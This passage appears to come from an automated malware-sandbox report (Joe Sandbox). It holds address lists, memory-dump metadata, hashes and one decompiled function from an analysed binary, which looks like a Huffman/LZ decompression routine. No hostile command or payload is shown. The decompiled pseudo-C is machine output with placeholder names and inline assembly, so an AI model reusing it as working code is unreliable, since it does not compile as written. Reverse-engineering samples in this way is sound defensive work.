                0x003df8a3
                0x003df8aa
                0x003df8ae
                0x003df8b0
                0x003df8b3
                0x003df8b8
                0x003df8be
                0x003df8c6
                0x003df8d3
                0x003df8d9
                0x003df8e0
                0x003df8e4
                0x003df8ef
                0x003df8f0
                0x003df8fa
                0x003df8fa
                0x003df8fa
                0x003df8fd
                0x003df900
                0x003df907
                0x003df90c
                0x003df911
                0x003df918
                0x003df926
                0x003df93d
                0x003df93f
                0x003df94a
                0x003df94f
                0x003df952
                0x003df95b
                0x003df95f
                0x003df966
                0x003df96b
                0x003df972
                0x003df982
                0x003df98b
                0x003df98d
                0x003df990
                0x003df9a4
                0x003df9ab
                0x003df9ae
                0x003df9b8
                0x003df9be
                0x003df9c2
                0x003df9d2
                0x003df9e1
                0x003df9e4
                0x003df9e6
                0x003df9ed
                0x003df9f0
                0x003dfa0c
                0x003dfa19
                0x003dfa1b
                0x003dfa1f
                0x003dfa26
                0x003dfa2d
                0x003dfa46
                0x003dfa4a
                0x003dfa4c
                0x003dfa50
                0x003dfa64
                0x003dfa7b
                0x003dfa80
                0x003dfa87
                0x003dfa9e
                0x003dfaa8
                0x003dfaaa
                0x003dfaae
                0x003dfaba
                0x003dfabf
                0x003dfac7
                0x003dfacd
                0x003dfad3
                0x003dfad7
                0x003dfae1
                0x00000000
                0x00000000
                0x003df8f6
                0x003df8f6
                0x003dfae9
                0x003dfaea
                0x003dfaee
                0x003dfaf0
                0x003dfaf0
                0x003dfaf0
                0x003dfaf5
                0x003dfaf9
                0x003dfafe
                0x003dfb03
                0x003dfb08
                0x003dfb0a
                0x003dfb0c
                0x003dfb10
                0x003dfb1f
                0x003dfb2e
                0x003dfb30
                0x003dfb33
                0x003dfb3b
                0x003dfb40
                0x003dfb49
                0x003dfb4f
                0x003dfb53
                0x003dfb57
                0x003dfb5e
                0x003dfb60
                0x003dfb73
                0x003dfb82
                0x003dfb84
                0x003dfb87
                0x003dfb8f
                0x003dfba2
                0x003dfba6
                0x003dfbaa
                0x003dfbad
                0x003dfbbd
                0x003dfbc6
                0x003dfbd0
                0x003dfbd3
                0x003dfbd5
                0x003dfbdc
                0x003dfbe0
                0x003dfbf5
                0x003dfbfe
                0x003dfc02
                0x003dfc06
                0x003dfc28
                0x003dfc34
                0x003dfc37
                0x003dfc39
                0x003dfc3c
                0x003dfc4a
                0x003dfc57
                0x003dfc74
                0x003dfc77
                0x003dfc7b
                0x003dfc7d
                0x003dfc80
                0x003dfc86
                0x003dfc8e
                0x003dfc97
                0x003dfc9b
                0x003dfca4
                0x003dfca8
                0x003dfcaa
                0x003dfcb1
                0x003dfcb5
                0x003dfcbe
                0x003dfcc2
                0x003dfcc5
                0x003dfcc8
                0x003dfccb
                0x003dfccd
                0x003dfcd7

                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                • Instruction ID: 8216051f1b0033d408d33bd99ef387443e8faf55edfaea3778612ffdbfd3c517
                • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                • Instruction Fuzzy Hash: 1C523B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E7153 Relevance: .5, Instructions: 536COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 88%
                			E003E7153(signed int __ecx) {
				void* __ebp;
				void* _t220;
				signed int* _t223;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t233;
				signed int _t234;
				signed short _t235;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				unsigned int _t250;
				signed int _t260;
				signed int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t274;
				signed int _t275;
				signed short _t276;
				signed int _t277;
				signed int _t281;
				signed int _t282;
				unsigned int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed int _t292;
				signed short _t293;
				unsigned int _t298;
				signed int _t303;
				unsigned int _t305;
				signed int _t310;
				signed short _t311;
				signed int _t316;
				intOrPtr* _t321;
				signed int* _t322;
				unsigned int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t340;
				signed int _t342;
				intOrPtr _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				void* _t349;
				signed int _t352;
				signed int _t353;
				unsigned int _t356;
				signed int _t357;
				void* _t358;
				signed int _t361;
				signed int _t362;
				void* _t365;
				signed int _t368;
				signed int _t369;
				intOrPtr* _t371;
				void* _t372;
				signed int* _t376;
				signed int _t379;
				unsigned int _t382;
				signed int _t383;
				void* _t384;
				signed int _t387;
				void* _t390;
				unsigned int _t393;
				signed int _t394;
				unsigned int _t397;
				void* _t399;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				void* _t411;
				signed int _t415;
				signed int _t416;
				intOrPtr* _t418;
				void* _t419;
				void* _t422;
				signed int _t425;
				intOrPtr* _t429;
				void* _t430;
				signed int* _t436;
				unsigned int _t438;
				unsigned int _t442;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				unsigned int _t451;
				unsigned int _t455;
				signed int _t458;
				unsigned int _t459;
				signed int _t461;
				signed int _t462;
				void* _t463;
				signed int _t464;
				signed int* _t465;
				signed char _t466;
				signed int* _t468;
				signed int* _t470;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				void* _t479;

				_t466 =  *(_t479 + 0x44);
				 *(_t479 + 0x30) = __ecx;
				_t321 = _t466 + 0x18;
				_t465 = _t466 + 4;
				if( *((char*)(_t466 + 0x2c)) != 0) {
					L2:
					_t344 =  *_t321;
					_t220 =  *((intOrPtr*)(_t466 + 0x24)) + _t344;
					if( *_t465 <= _t220) {
						 *(_t466 + 0x4ad8) =  *(_t466 + 0x4ad8) & 0x00000000;
						_t223 =  *((intOrPtr*)(_t466 + 0x20)) - 1 + _t344;
						_t436 =  *((intOrPtr*)(_t466 + 0x4acc)) - 0x10;
						 *(_t479 + 0x1c) = _t223;
						 *(_t479 + 0x18) = _t436;
						__eflags = _t223 - _t436;
						if(_t223 >= _t436) {
							_t468 = _t436;
							 *(_t479 + 0x14) = _t436;
						} else {
							_t468 = _t223;
							 *(_t479 + 0x14) = _t468;
						}
						_t322 = _t466 + 0x4ad4;
						while(1) {
							_t345 =  *_t465;
							 *(_t479 + 0x10) = _t322;
							__eflags = _t345 - _t468;
							if(_t345 < _t468) {
								goto L15;
							}
							__eflags = _t345 - _t223;
							if(__eflags > 0) {
								L93:
								return _t223;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t345 - _t436;
								if(_t345 < _t436) {
									L14:
									_t223 = _t466 + 0x4ad4;
									_t322 = _t223;
									 *(_t479 + 0x10) = _t223;
									__eflags = _t345 -  *((intOrPtr*)(_t466 + 0x4acc));
									if(_t345 >=  *((intOrPtr*)(_t466 + 0x4acc))) {
										L92:
										 *((char*)(_t466 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t466 + 0x4ad2));
								if( *((char*)(_t466 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t223 =  *(_t466 + 8);
							__eflags = _t223 -  *((intOrPtr*)(_t466 + 0x1c));
							if(_t223 >=  *((intOrPtr*)(_t466 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t346 =  *(_t466 + 0x4adc);
							__eflags =  *(_t466 + 0x4ad8) - _t346 - 8;
							if( *(_t466 + 0x4ad8) > _t346 - 8) {
								_t316 = _t346 + _t346;
								 *(_t466 + 0x4adc) = _t316;
								_push(_t316 * 0xc);
								_push( *_t322);
								_t477 = E003F3E3E(_t346, _t436);
								__eflags = _t477;
								if(_t477 == 0) {
									E003D6CA7(0x411098);
								}
								 *_t322 = _t477;
							}
							_t225 =  *(_t466 + 0x4ad8);
							_t470 = _t225 * 0xc +  *_t322;
							 *(_t479 + 0x2c) = _t470;
							 *(_t466 + 0x4ad8) = _t225 + 1;
							_t227 = E003DA89D(_t465);
							_t228 =  *(_t466 + 0xb4);
							_t438 = _t227 & 0x0000fffe;
							__eflags = _t438 -  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4));
							if(_t438 >=  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4))) {
								_t348 = 0xf;
								_t229 = _t228 + 1;
								 *(_t479 + 0x28) = _t348;
								__eflags = _t229 - _t348;
								if(_t229 >= _t348) {
									L27:
									_t324 = _t465[1] + _t348;
									_t325 = _t324 & 0x00000007;
									 *_t465 =  *_t465 + (_t324 >> 3);
									 *(_t479 + 0x18) =  *_t465;
									_t233 =  *(_t479 + 0x28);
									_t465[1] = _t325;
									_t349 = 0x10;
									_t352 =  *((intOrPtr*)(_t466 + 0x74 + _t233 * 4)) + (_t438 -  *((intOrPtr*)(_t466 + 0x30 + _t233 * 4)) >> _t349 - _t233);
									__eflags = _t352 -  *((intOrPtr*)(_t466 + 0x30));
									asm("sbb eax, eax");
									_t234 = _t233 & _t352;
									__eflags = _t234;
									_t235 =  *(_t466 + 0xcb8 + _t234 * 2) & 0x0000ffff;
									goto L28;
								}
								_t429 = _t466 + 0x34 + _t229 * 4;
								while(1) {
									__eflags = _t438 -  *_t429;
									if(_t438 <  *_t429) {
										break;
									}
									_t229 = _t229 + 1;
									_t429 = _t429 + 4;
									__eflags = _t229 - 0xf;
									if(_t229 < 0xf) {
										continue;
									}
									_t348 =  *(_t479 + 0x28);
									goto L27;
								}
								_t348 = _t229;
								 *(_t479 + 0x28) = _t229;
								goto L27;
							} else {
								_t430 = 0x10;
								_t464 = _t438 >> _t430 - _t228;
								_t342 = ( *(_t464 + _t466 + 0xb8) & 0x000000ff) + _t465[1];
								 *_t465 =  *_t465 + (_t342 >> 3);
								_t325 = _t342 & 0x00000007;
								 *(_t479 + 0x18) =  *_t465;
								_t465[1] = _t325;
								_t235 =  *(_t466 + 0x4b8 + _t464 * 2) & 0x0000ffff;
								L28:
								_t353 = _t235 & 0x0000ffff;
								__eflags = _t353 - 0x100;
								if(_t353 >= 0x100) {
									__eflags = _t353 - 0x106;
									if(_t353 < 0x106) {
										__eflags = _t353 - 0x100;
										if(_t353 != 0x100) {
											__eflags = _t353 - 0x101;
											if(_t353 != 0x101) {
												_t237 = 3;
												 *_t470 = _t237;
												_t470[2] = _t353 - 0x102;
												_t239 = E003DA89D(_t465);
												_t240 =  *(_t466 + 0x2d78);
												_t442 = _t239 & 0x0000fffe;
												__eflags = _t442 -  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4));
												if(_t442 >=  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4))) {
													_t326 = 0xf;
													_t241 = _t240 + 1;
													__eflags = _t241 - _t326;
													if(_t241 >= _t326) {
														L86:
														_t356 = _t465[1] + _t326;
														_t357 = _t356 & 0x00000007;
														_t465[1] = _t357;
														_t243 = _t356 >> 3;
														 *_t465 =  *_t465 + _t243;
														 *(_t479 + 0x30) = _t357;
														_t358 = 0x10;
														_t361 =  *((intOrPtr*)(_t466 + 0x2d38 + _t326 * 4)) + (_t442 -  *((intOrPtr*)(_t466 + 0x2cf4 + _t326 * 4)) >> _t358 - _t326);
														__eflags = _t361 -  *((intOrPtr*)(_t466 + 0x2cf4));
														asm("sbb eax, eax");
														_t244 = _t243 & _t361;
														__eflags = _t244;
														_t245 =  *(_t466 + 0x397c + _t244 * 2) & 0x0000ffff;
														L87:
														_t246 = _t245 & 0x0000ffff;
														__eflags = _t246 - 8;
														if(_t246 >= 8) {
															_t362 = 3;
															_t329 = (_t246 >> 2) - 1;
															_t445 = ((_t246 & _t362 | 0x00000004) << _t329) + 2;
															 *(_t479 + 0x2c) = _t445;
															__eflags = _t329;
															if(_t329 != 0) {
																_t250 = E003DA89D(_t465);
																_t365 = 0x10;
																_t445 =  *(_t479 + 0x2c) + (_t250 >> _t365 - _t329);
																_t368 =  *(_t479 + 0x30) + _t329;
																 *_t465 =  *_t465 + (_t368 >> 3);
																_t369 = _t368 & 0x00000007;
																__eflags = _t369;
																_t465[1] = _t369;
															}
														} else {
															_t445 = _t246 + 2;
														}
														_t470[1] = _t445;
														L33:
														_t322 =  *(_t479 + 0x10);
														L34:
														_t436 =  *(_t479 + 0x1c);
														_t223 =  *(_t479 + 0x20);
														_t468 =  *(_t479 + 0x14);
														continue;
													}
													_t371 = _t466 + 0x2cf8 + _t241 * 4;
													while(1) {
														__eflags = _t442 -  *_t371;
														if(_t442 <  *_t371) {
															break;
														}
														_t241 = _t241 + 1;
														_t371 = _t371 + 4;
														__eflags = _t241 - 0xf;
														if(_t241 < 0xf) {
															continue;
														}
														goto L86;
													}
													_t326 = _t241;
													goto L86;
												}
												_t372 = 0x10;
												_t447 = _t442 >> _t372 - _t240;
												_t331 = ( *(_t447 + _t466 + 0x2d7c) & 0x000000ff) + _t465[1];
												 *_t465 =  *_t465 + (_t331 >> 3);
												_t332 = _t331 & 0x00000007;
												_t465[1] = _t332;
												_t245 =  *(_t466 + 0x317c + _t447 * 2) & 0x0000ffff;
												 *(_t479 + 0x30) = _t332;
												goto L87;
											}
											 *_t470 = 2;
											goto L33;
										}
										_push(_t479 + 0x38);
										E003E3F9D( *((intOrPtr*)(_t479 + 0x34)), _t465);
										_t322 =  *(_t479 + 0x10);
										_t470[1] =  *(_t479 + 0x38) & 0x000000ff;
										_t470[2] =  *(_t479 + 0x3c);
										_t448 = 4;
										 *_t470 = _t448;
										_t260 =  *(_t466 + 0x4ad8);
										_t376 = _t260 * 0xc +  *_t322;
										 *(_t466 + 0x4ad8) = _t260 + 1;
										_t376[1] =  *(_t479 + 0x44) & 0x000000ff;
										 *_t376 = _t448;
										_t376[2] =  *(_t479 + 0x40);
										goto L34;
									}
									_t264 = _t353 - 0x106;
									__eflags = _t264 - 8;
									if(_t264 >= 8) {
										_t449 = 3;
										_t379 = (_t264 >> 2) - 1;
										 *(_t479 + 0x30) = _t379;
										 *(_t479 + 0x24) = ((_t264 & _t449 | 0x00000004) << _t379) + 2;
										__eflags = _t379;
										if(_t379 != 0) {
											_t305 = E003DA89D(_t465);
											_t340 = _t325 +  *(_t479 + 0x30);
											_t422 = 0x10;
											 *(_t479 + 0x24) =  *(_t479 + 0x24) + (_t305 >> _t422 -  *(_t479 + 0x30));
											_t425 =  *(_t479 + 0x18) + (_t340 >> 3);
											_t325 = _t340 & 0x00000007;
											__eflags = _t325;
											 *(_t479 + 0x18) = _t425;
											 *_t465 = _t425;
											_t465[1] = _t325;
										}
									} else {
										 *(_t479 + 0x24) = _t264 + 2;
									}
									_t269 = E003DA89D(_t465);
									_t270 =  *(_t466 + 0xfa0);
									_t451 = _t269 & 0x0000fffe;
									__eflags = _t451 -  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4));
									if(_t451 >=  *((intOrPtr*)(_t466 + 0xf20 + _t270 * 4))) {
										_t333 = 0xf;
										_t271 = _t270 + 1;
										__eflags = _t271 - _t333;
										if(_t271 >= _t333) {
											L49:
											_t382 = _t465[1] + _t333;
											_t383 = _t382 & 0x00000007;
											_t465[1] = _t383;
											 *_t465 =  *_t465 + (_t382 >> 3);
											_t274 =  *_t465;
											 *(_t479 + 0x18) = _t383;
											_t384 = 0x10;
											 *(_t479 + 0x28) = _t274;
											_t387 =  *((intOrPtr*)(_t466 + 0xf60 + _t333 * 4)) + (_t451 -  *((intOrPtr*)(_t466 + 0xf1c + _t333 * 4)) >> _t384 - _t333);
											__eflags = _t387 -  *((intOrPtr*)(_t466 + 0xf1c));
											asm("sbb eax, eax");
											_t275 = _t274 & _t387;
											__eflags = _t275;
											_t276 =  *(_t466 + 0x1ba4 + _t275 * 2) & 0x0000ffff;
											goto L50;
										}
										_t418 = _t466 + 0xf20 + _t271 * 4;
										while(1) {
											__eflags = _t451 -  *_t418;
											if(_t451 <  *_t418) {
												break;
											}
											_t271 = _t271 + 1;
											_t418 = _t418 + 4;
											__eflags = _t271 - 0xf;
											if(_t271 < 0xf) {
												continue;
											}
											goto L49;
										}
										_t333 = _t271;
										goto L49;
									} else {
										_t419 = 0x10;
										_t459 = _t451 >> _t419 - _t270;
										 *(_t479 + 0x30) = _t459;
										_t461 = ( *(_t459 + _t466 + 0xfa4) & 0x000000ff) + _t325;
										_t303 = (_t461 >> 3) +  *(_t479 + 0x18);
										_t462 = _t461 & 0x00000007;
										 *(_t479 + 0x28) = _t303;
										 *_t465 = _t303;
										_t465[1] = _t462;
										 *(_t479 + 0x18) = _t462;
										_t276 =  *(_t466 + 0x13a4 +  *(_t479 + 0x30) * 2) & 0x0000ffff;
										L50:
										_t277 = _t276 & 0x0000ffff;
										__eflags = _t277 - 4;
										if(_t277 >= 4) {
											_t473 = (_t277 >> 1) - 1;
											_t281 = ((_t277 & 0x00000001 | 0x00000002) << _t473) + 1;
											 *(_t479 + 0x30) = _t281;
											_t334 = _t281;
											__eflags = _t473;
											if(_t473 == 0) {
												L68:
												_t470 =  *(_t479 + 0x2c);
												L69:
												_t282 =  *(_t479 + 0x24);
												__eflags = _t334 - 0x100;
												if(_t334 > 0x100) {
													_t282 = _t282 + 1;
													__eflags = _t334 - 0x2000;
													if(_t334 > 0x2000) {
														_t282 = _t282 + 1;
														__eflags = _t334 - 0x40000;
														if(_t334 > 0x40000) {
															_t282 = _t282 + 1;
															__eflags = _t282;
														}
													}
												}
												 *_t470 = 1;
												_t470[1] = _t282;
												_t470[2] = _t334;
												goto L33;
											}
											__eflags = _t473 - 4;
											if(__eflags < 0) {
												_t283 = E003E8934(_t465);
												_t390 = 0x20;
												_t334 = (_t283 >> _t390 - _t473) +  *(_t479 + 0x30);
												_t393 =  *(_t479 + 0x18) + _t473;
												_t394 = _t393 & 0x00000007;
												__eflags = _t394;
												 *_t465 = (_t393 >> 3) +  *(_t479 + 0x28);
												_t465[1] = _t394;
												goto L68;
											}
											if(__eflags <= 0) {
												_t474 =  *(_t479 + 0x28);
											} else {
												_t298 = E003E8934(_t465);
												_t411 = 0x24;
												_t334 = (_t298 >> _t411 - _t473 << 4) +  *(_t479 + 0x30);
												_t415 =  *(_t479 + 0x18) + 0xfffffffc + _t473;
												_t474 =  *(_t479 + 0x28) + (_t415 >> 3);
												_t416 = _t415 & 0x00000007;
												 *_t465 = _t474;
												 *(_t479 + 0x18) = _t416;
												_t465[1] = _t416;
											}
											_t287 = E003DA89D(_t465);
											_t288 =  *(_t466 + 0x1e8c);
											_t455 = _t287 & 0x0000fffe;
											__eflags = _t455 -  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4));
											if(_t455 >=  *((intOrPtr*)(_t466 + 0x1e0c + _t288 * 4))) {
												_t475 = 0xf;
												_t289 = _t288 + 1;
												__eflags = _t289 - _t475;
												if(_t289 >= _t475) {
													L65:
													_t397 = _t465[1] + _t475;
													_t465[1] = _t397 & 0x00000007;
													_t291 = _t397 >> 3;
													 *_t465 =  *_t465 + _t291;
													_t399 = 0x10;
													_t402 =  *((intOrPtr*)(_t466 + 0x1e4c + _t475 * 4)) + (_t455 -  *((intOrPtr*)(_t466 + 0x1e08 + _t475 * 4)) >> _t399 - _t475);
													__eflags = _t402 -  *((intOrPtr*)(_t466 + 0x1e08));
													asm("sbb eax, eax");
													_t292 = _t291 & _t402;
													__eflags = _t292;
													_t293 =  *(_t466 + 0x2a90 + _t292 * 2) & 0x0000ffff;
													goto L66;
												}
												_t404 = _t466 + 0x1e0c + _t289 * 4;
												while(1) {
													__eflags = _t455 -  *_t404;
													if(_t455 <  *_t404) {
														break;
													}
													_t289 = _t289 + 1;
													_t404 = _t404 + 4;
													__eflags = _t289 - 0xf;
													if(_t289 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t475 = _t289;
												goto L65;
											} else {
												_t405 = 0x10;
												_t458 = _t455 >> _t405 - _t288;
												_t408 = ( *(_t458 + _t466 + 0x1e90) & 0x000000ff) +  *(_t479 + 0x18);
												 *_t465 = (_t408 >> 3) + _t474;
												_t465[1] = _t408 & 0x00000007;
												_t293 =  *(_t466 + 0x2290 + _t458 * 2) & 0x0000ffff;
												L66:
												_t334 = _t334 + (_t293 & 0x0000ffff);
												goto L68;
											}
										}
										_t334 = _t277 + 1;
										goto L69;
									}
								}
								__eflags =  *(_t466 + 0x4ad8) - 1;
								if( *(_t466 + 0x4ad8) <= 1) {
									L35:
									 *_t470 =  *_t470 & 0x00000000;
									_t470[2] = _t353;
									_t470[1] = 0;
									goto L33;
								}
								__eflags =  *(_t470 - 0xc);
								if( *(_t470 - 0xc) != 0) {
									goto L35;
								}
								_t310 =  *(_t470 - 8) & 0x0000ffff;
								_t463 = 3;
								__eflags = _t310 - _t463;
								if(_t310 >= _t463) {
									goto L35;
								}
								_t311 = _t310 + 1;
								 *(_t470 - 8) = _t311;
								 *((_t311 & 0x0000ffff) + _t470 - 4) = _t353;
								_t72 = _t466 + 0x4ad8;
								 *_t72 =  *(_t466 + 0x4ad8) - 1;
								__eflags =  *_t72;
								goto L33;
							}
						}
					}
					L3:
					 *((char*)(_t466 + 0x4ad0)) = 1;
					return _t220;
				}
				 *((char*)(_t466 + 0x2c)) = 1;
				_push(_t466 + 0x30);
				_push(_t321);
				_push(_t465);
				_t220 = E003E43BF(__ecx);
				if(_t220 == 0) {
					goto L3;
				}
				goto L2;
			}



























































































































                0x003e7158
                0x003e715d
                0x003e7165
                0x003e7168
                0x003e716b
                0x003e7180
                0x003e7183
                0x003e7185
                0x003e7189
                0x003e71a1
                0x003e71a8
                0x003e71aa
                0x003e71ad
                0x003e71b1
                0x003e71b6
                0x003e71b8
                0x003e71c2
                0x003e71c4
                0x003e71ba
                0x003e71ba
                0x003e71bc
                0x003e71bc
                0x003e71c8
                0x003e71ce
                0x003e71ce
                0x003e71d0
                0x003e71d4
                0x003e71d6
                0x00000000
                0x00000000
                0x003e71d8
                0x003e71da
                0x003e77b6
                0x00000000
                0x003e77b6
                0x003e71e0
                0x003e71ee
                0x003e71ee
                0x003e71f0
                0x003e71ff
                0x003e71ff
                0x003e7205
                0x003e7207
                0x003e720b
                0x003e7211
                0x003e77af
                0x003e77af
                0x00000000
                0x003e77af
                0x00000000
                0x003e7211
                0x003e71f2
                0x003e71f9
                0x00000000
                0x00000000
                0x00000000
                0x003e71f9
                0x003e71e2
                0x003e71e5
                0x003e71e8
                0x00000000
                0x00000000
                0x00000000
                0x003e7217
                0x003e7217
                0x003e7220
                0x003e7226
                0x003e7228
                0x003e722b
                0x003e7234
                0x003e7235
                0x003e723c
                0x003e7240
                0x003e7242
                0x003e7249
                0x003e7249
                0x003e724e
                0x003e724e
                0x003e7250
                0x003e725b
                0x003e725e
                0x003e7262
                0x003e7268
                0x003e726f
                0x003e7275
                0x003e727b
                0x003e727f
                0x003e72b2
                0x003e72b3
                0x003e72b4
                0x003e72b8
                0x003e72ba
                0x003e72db
                0x003e72de
                0x003e72e2
                0x003e72e8
                0x003e72ec
                0x003e72f0
                0x003e72f4
                0x003e72f9
                0x003e7306
                0x003e7308
                0x003e730b
                0x003e730d
                0x003e730d
                0x003e730f
                0x00000000
                0x003e730f
                0x003e72bf
                0x003e72c2
                0x003e72c2
                0x003e72c4
                0x00000000
                0x00000000
                0x003e72c6
                0x003e72c7
                0x003e72ca
                0x003e72cd
                0x00000000
                0x00000000
                0x003e72cf
                0x00000000
                0x003e72cf
                0x003e72d5
                0x003e72d7
                0x00000000
                0x003e7281
                0x003e7283
                0x003e7286
                0x003e7290
                0x003e7298
                0x003e729a
                0x003e729f
                0x003e72a3
                0x003e72a6
                0x003e7317
                0x003e7317
                0x003e731f
                0x003e7321
                0x003e7374
                0x003e737a
                0x003e7630
                0x003e7632
                0x003e7686
                0x003e768c
                0x003e769c
                0x003e769d
                0x003e76a8
                0x003e76ab
                0x003e76b2
                0x003e76b8
                0x003e76be
                0x003e76c5
                0x003e76f6
                0x003e76f7
                0x003e76f8
                0x003e76fa
                0x003e7716
                0x003e7719
                0x003e771d
                0x003e7720
                0x003e7723
                0x003e7726
                0x003e772f
                0x003e7735
                0x003e7741
                0x003e7743
                0x003e7749
                0x003e774b
                0x003e774b
                0x003e774d
                0x003e7755
                0x003e7755
                0x003e7758
                0x003e775b
                0x003e7769
                0x003e776c
                0x003e7774
                0x003e7777
                0x003e777b
                0x003e777d
                0x003e7781
                0x003e778c
                0x003e7795
                0x003e7797
                0x003e779e
                0x003e77a0
                0x003e77a0
                0x003e77a3
                0x003e77a3
                0x003e775d
                0x003e775d
                0x003e775d
                0x003e77a6
                0x003e7350
                0x003e7350
                0x003e7354
                0x003e7354
                0x003e7358
                0x003e735c
                0x00000000
                0x003e735c
                0x003e7702
                0x003e7705
                0x003e7705
                0x003e7707
                0x00000000
                0x00000000
                0x003e7709
                0x003e770a
                0x003e770d
                0x003e7710
                0x00000000
                0x00000000
                0x00000000
                0x003e7712
                0x003e7714
                0x00000000
                0x003e7714
                0x003e76c9
                0x003e76cc
                0x003e76d6
                0x003e76de
                0x003e76e0
                0x003e76e3
                0x003e76e6
                0x003e76ee
                0x00000000
                0x003e76ee
                0x003e768e
                0x00000000
                0x003e768e
                0x003e763c
                0x003e763e
                0x003e7648
                0x003e764c
                0x003e7654
                0x003e7659
                0x003e765a
                0x003e765d
                0x003e7666
                0x003e7669
                0x003e7674
                0x003e767c
                0x003e767e
                0x00000000
                0x003e767e
                0x003e7380
                0x003e7386
                0x003e7389
                0x003e73a0
                0x003e73a6
                0x003e73af
                0x003e73b3
                0x003e73b7
                0x003e73b9
                0x003e73bd
                0x003e73c2
                0x003e73c8
                0x003e73cf
                0x003e73dc
                0x003e73de
                0x003e73de
                0x003e73e1
                0x003e73e5
                0x003e73e7
                0x003e73e7
                0x003e738b
                0x003e7396
                0x003e7396
                0x003e73ec
                0x003e73f3
                0x003e73f9
                0x003e73ff
                0x003e7406
                0x003e7446
                0x003e7447
                0x003e7448
                0x003e744a
                0x003e7466
                0x003e7469
                0x003e746d
                0x003e7470
                0x003e7476
                0x003e747f
                0x003e7481
                0x003e7487
                0x003e748a
                0x003e7497
                0x003e7499
                0x003e749f
                0x003e74a1
                0x003e74a1
                0x003e74a3
                0x00000000
                0x003e74a3
                0x003e7452
                0x003e7455
                0x003e7455
                0x003e7457
                0x00000000
                0x00000000
                0x003e7459
                0x003e745a
                0x003e745d
                0x003e7460
                0x00000000
                0x00000000
                0x00000000
                0x003e7462
                0x003e7464
                0x00000000
                0x003e7408
                0x003e740a
                0x003e740d
                0x003e740f
                0x003e741b
                0x003e7422
                0x003e7426
                0x003e7429
                0x003e742d
                0x003e7433
                0x003e7436
                0x003e743a
                0x003e74ab
                0x003e74ab
                0x003e74ae
                0x003e74b1
                0x003e74c5
                0x003e74ca
                0x003e74cb
                0x003e74cf
                0x003e74d1
                0x003e74d3
                0x003e75fa
                0x003e75fa
                0x003e75fe
                0x003e75fe
                0x003e7602
                0x003e7608
                0x003e760a
                0x003e760b
                0x003e7611
                0x003e7613
                0x003e7614
                0x003e761a
                0x003e761c
                0x003e761c
                0x003e761c
                0x003e761a
                0x003e7611
                0x003e761d
                0x003e7624
                0x003e7628
                0x00000000
                0x003e7628
                0x003e74d9
                0x003e74dc
                0x003e75d1
                0x003e75da
                0x003e75e3
                0x003e75e7
                0x003e75f2
                0x003e75f2
                0x003e75f5
                0x003e75f7
                0x00000000
                0x003e75f7
                0x003e74e2
                0x003e751d
                0x003e74e4
                0x003e74e6
                0x003e74ef
                0x003e74fe
                0x003e7502
                0x003e750d
                0x003e750f
                0x003e7512
                0x003e7514
                0x003e7518
                0x003e7518
                0x003e7523
                0x003e752a
                0x003e7530
                0x003e7536
                0x003e753d
                0x003e756d
                0x003e756e
                0x003e756f
                0x003e7571
                0x003e758d
                0x003e7590
                0x003e7597
                0x003e759a
                0x003e759d
                0x003e75a8
                0x003e75b4
                0x003e75b6
                0x003e75bc
                0x003e75be
                0x003e75be
                0x003e75c0
                0x00000000
                0x003e75c0
                0x003e7579
                0x003e757c
                0x003e757c
                0x003e757e
                0x00000000
                0x00000000
                0x003e7580
                0x003e7581
                0x003e7584
                0x003e7587
                0x00000000
                0x00000000
                0x00000000
                0x003e7589
                0x003e758b
                0x00000000
                0x003e753f
                0x003e7541
                0x003e7544
                0x003e754e
                0x003e755c
                0x003e755e
                0x003e7561
                0x003e75c8
                0x003e75cb
                0x00000000
                0x003e75cb
                0x003e753d
                0x003e74b3
                0x00000000
                0x003e74b3
                0x003e7406
                0x003e7323
                0x003e732a
                0x003e7365
                0x003e7365
                0x003e736b
                0x003e736e
                0x00000000
                0x003e736e
                0x003e732c
                0x003e7330
                0x00000000
                0x00000000
